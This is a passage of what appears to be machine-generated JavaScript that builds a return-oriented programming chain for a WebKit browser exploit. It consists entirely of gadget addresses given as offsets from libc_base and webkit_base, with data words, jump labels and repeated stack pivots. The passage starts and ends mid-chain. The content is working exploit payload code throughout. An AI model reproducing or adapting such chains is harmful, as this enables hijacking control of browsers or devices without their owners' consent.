libc_base+764760, //pop rsi
ropchain+334088, //L6689
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6689:
db([0, 0]); // 0x0
set_gadgets([
ropchain+334112, //L6689+24
ropchain+334128, //L6684
libc_base+782311, //pop rsp
ropchain+340568, //L6690
//L6684:
libc_base+764760, //pop rsi
ropchain+334168, //L6691
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6691:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6693:
db([4294967268, 4294967295]); // -0x1c
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+334288, //L6696
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+334272, //L6694
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6694:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6696:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+334464, //L6699
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+334480, //L6700
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+334432, //L6697
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+334448, //L6698
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6697:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6698:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6699:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6700:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+334560, //L6701
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+334576, //L6702
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6701:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6702:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+334672, //L6704
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+334656, //L6703
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6703:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6704:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+334752, //L6705
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6705:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6706:
db([35, 0]); // 0x23
set_gadget(libc_base+144605,); //pop rdi
//L6707:
db([35, 0]); // 0x23
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+334896, //L6708
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+334928, //L6710
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+334912, //L6709
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6708:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6709:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6710:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+335096, //L6712
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+335112, //L6713
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+335080, //L6711
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6711:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6712:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6713:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+335224, //L6715
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+335272, //L6718
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+335240, //L6716
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6715:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6716:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6717:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6718:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+335384, //L6719+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+335376, //L6719
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6719:
db([0, 0]); // 0x0
set_gadgets([
ropchain+335400, //L6719+24
ropchain+335416, //L6714
libc_base+782311, //pop rsp
ropchain+342280, //L6720
//L6714:
libc_base+782311, //pop rsp
ropchain+343992, //L6721
//L6600:
libc_base+764760, //pop rsi
ropchain+335472, //L6722
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6722:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6724:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+335592, //L6727
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+335576, //L6725
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6725:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6727:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+335768, //L6730
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+335784, //L6731
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+335736, //L6728
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+335752, //L6729
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6728:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6729:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6730:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6731:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+335880, //L6733
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+335864, //L6732
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6732:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6733:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6734:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6735:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L6736:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+336080, //L6738
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6738:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+336136, //L6739
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6739:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+336272, //L6743
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+336256, //L6742
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6741:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6742:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6743:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+336336, //L6744
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6744:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6746:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L6748:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+336496, //L6751
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+336480, //L6749
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6749:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6751:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+336640, //L6754
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+336608, //L6752
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+336624, //L6753
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6752:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6753:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6754:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+336728, //L6756
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6755:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L6756:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+336784, //L6757
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6757:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6759:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+336864, //L6761
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6761:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+336960, //L6763
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6762:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6763:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6764:
db([1, 0]); // 0x1
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+337040, //L6765
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6765:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6767:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+337120, //L6769
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6769:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+344232, //L6768
//L6630:
libc_base+764760, //pop rsi
ropchain+337184, //L6771
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6771:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6773:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+337304, //L6776
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+337288, //L6774
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6774:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6776:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+337480, //L6779
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+337496, //L6780
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+337448, //L6777
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+337464, //L6778
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6777:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6778:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6779:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6780:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+337592, //L6782
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+337576, //L6781
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6781:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6782:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6783:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6784:
db([1, 0]); // 0x1
set_gadget(libc_base+763368,); //pop rcx
//L6785:
db([1, 0]); // 0x1
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+337792, //L6787
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6787:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+337848, //L6788
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6788:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+337984, //L6792
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+337968, //L6791
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6790:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6791:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6792:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+338048, //L6793
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6793:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6795:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L6797:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+338208, //L6800
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+338192, //L6798
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6798:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6800:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+338352, //L6803
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+338320, //L6801
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+338336, //L6802
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6801:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6802:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6803:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+338440, //L6805
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6804:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L6805:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+338496, //L6806
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6806:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6808:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+338576, //L6810
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6810:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+338672, //L6812
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6811:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6812:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6813:
db([1, 0]); // 0x1
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+338752, //L6814
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6814:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6816:
db([4294967280, 4294967295]); // -0x10
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+338832, //L6817
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6817:
db([0, 0]); // 0x0
set_gadgets([
libc_base+782311, //pop rsp
ropchain+344232, //L6768
//L6660:
libc_base+764760, //pop rsi
ropchain+338896, //L6819
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6819:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6821:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+339016, //L6824
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+339000, //L6822
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6822:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6824:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+339192, //L6827
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+339208, //L6828
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+339160, //L6825
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+339176, //L6826
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6825:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6826:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6827:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6828:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+339304, //L6830
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+339288, //L6829
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6829:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6830:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6831:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L6832:
db([2, 0]); // 0x2
set_gadget(libc_base+763368,); //pop rcx
//L6833:
db([2, 0]); // 0x2
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+339504, //L6835
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6835:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+339560, //L6836
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6836:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+339696, //L6840
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+339680, //L6839
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6838:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6839:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6840:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+339760, //L6841
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6841:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6843:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+731401, //mov rax, r8
libc_base+764760 //pop rsi
]);
//L6845:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+339920, //L6848
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+339904, //L6846
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6846:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6848:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+340064, //L6851
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+340032, //L6849
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+340048, //L6850
